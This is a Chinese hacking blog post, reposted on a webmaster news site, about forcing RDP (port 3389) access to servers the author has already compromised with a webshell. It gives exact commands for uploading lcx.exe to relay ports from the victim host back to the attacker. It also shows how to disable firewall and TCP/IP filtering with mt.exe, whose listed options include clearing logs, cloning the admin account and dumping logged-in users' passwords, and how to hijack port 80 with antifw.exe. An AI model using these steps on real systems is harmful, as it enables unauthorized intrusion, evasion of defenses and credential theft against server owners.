| 對于開了3389,連接不上,有幾個方面的原因,我來總結(jié)下,哇咔咔,這幾天提好幾臺服務(wù)器都TM這樣,分析下, 原因1、遠(yuǎn)程桌面端口被更改。2、對方服務(wù)器處于內(nèi)網(wǎng)。3、防火墻攔截。4、TCP/IP安全限制。 好了,知道原因了,我們來一個一個思考解決方法(部分引用): 遠(yuǎn)程桌面端口被更改解決方法: 現(xiàn)在一般的asp大馬都有探測服務(wù)器的功能,在權(quán)限還行的情況下都可以直接查看遠(yuǎn)程(Terminal Service)端口,或者可以查看注冊表也可以得到遠(yuǎn)程桌面端口,asp權(quán)限不行,在支持aspx的時候就換aspx查看注冊表。 對方服務(wù)器處于內(nèi)網(wǎng)解決方法: 這種情況我們可以使用lcx做端口轉(zhuǎn)發(fā),不知道的或者沒有的就百度“l(fā)cx.exe下載”,我就不提供下載了。 使用方法: 1.上傳lcx.exe到目標(biāo)服務(wù)器可執(zhí)行目錄 2.本地主機(jī)啟動lcx.exe監(jiān)聽,命令: lcx.exe -listen 1988 4567 // 監(jiān)聽1988端口并轉(zhuǎn)發(fā)到4567端口 在目標(biāo)主機(jī)運(yùn)行: 格式為: lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機(jī)IP 要轉(zhuǎn)發(fā)的目標(biāo)主機(jī)端口 例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389 3.本地鏈接:127.0.0.1:1988 OK,有點(diǎn)小麻煩,不過還是很管用的,要是你也是內(nèi)網(wǎng),你就做下端口映射就好了,映射到轉(zhuǎn)發(fā)回來的端口,哇咔咔。 4、防火墻攔截解決辦法: 一般還是先試試端口轉(zhuǎn)發(fā),還是利用LCX, 使用方法: lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機(jī) 要轉(zhuǎn)發(fā)的目標(biāo)主機(jī)端口 例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389 然后本地連接:127.0.0.1:1988 就搞定了。 如果還不行。。要是web是SYSTEM權(quán)限,直接停掉防火墻服務(wù)就沒問題了。 5、TCP/IP安全策略限制。 這個解決方法就有點(diǎn)多了,可以使用MT.EXE來關(guān)閉策略, 使用方法: 1.上傳mt.exe到目標(biāo)服務(wù)器可執(zhí)行目錄 2.執(zhí)行命令:mt.exe -filter off 這樣就關(guān)閉了TCP/IP限制了 選項: -filter —更改TCP/IP 過濾器的開頭狀態(tài) -addport —添加端口到過濾器的允許列表 -setport —設(shè)置端口作為過濾器的允許列表 -nicinfo —列出TCP/IP 界面信息 -pslist —列出活動進(jìn)程 -pskill —?dú)⒍局付ㄟM(jìn)程 -dlllist —列出指定進(jìn)程的DLL -sysinfo —列出系統(tǒng)信息 -shutdown —關(guān)閉系統(tǒng) -reboot —重啟系統(tǒng) -poweroff —關(guān)閉電源 -logoff —注銷當(dāng)前用戶會話 -chkts —檢查終端服務(wù)信息 -setupts —安裝終端服務(wù) -remts —卸載終端服務(wù) -chgtsp —重置終端服務(wù)端口 -clog —清除系統(tǒng)日志 -enumsrv —列出所有服務(wù) -querysrv —列出指定服務(wù)的詳細(xì)信息 -instsrv —安裝一個服務(wù) -cfgsrv —更改服務(wù)配置 -remsrv —卸載指定服務(wù) -startsrv —啟動指定服務(wù) -stopsrv —停止指定服務(wù) -netget —從http/ftp 下載 -redirect —端口重定向 -chkuser —列出所有賬戶、sid 和anti 克隆 -clone —克隆admin 到目標(biāo) -never —設(shè)置賬戶看上去從未登錄 -killuser —刪除賬戶,甚至是 “guest” 也可刪除 -su —以Local_System 權(quán)限運(yùn)行進(jìn)程 -findpass —顯示所有已登錄用戶的口令 -netstat —列出TCP 連接 -killtcp —?dú)⑺繲CP 連接 -psport —映射端口到進(jìn)程 -touch —設(shè)置文件日期和時間到指定值 -secdel —安全擦除文件或目錄占用的空間 -regshell —進(jìn)入一個控制臺注冊表編輯器 -chkdll —檢測gina dll 后門 上面只是一種方法,再說一種好用的方法吧,成功率灰常高,哇咔咔。 使用antifw.exe這個工具, 使用方法: 在cmd下輸入 antifw -s 運(yùn)行程序 停止iis將3389改為80 antifw -l 關(guān)閉程序。恢復(fù)iis 連接的時候直接連接他的80端口就OK了,內(nèi)網(wǎng)外網(wǎng)通殺!成功率比較高。但是這樣他網(wǎng)站就訪問不了。。。 沒事,上去了我們趕緊分析原因,排除萬難,把限制去掉,再給他還原80端口,哇咔咔。。。 By:Seay |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長網(wǎng)微信
大家都在看
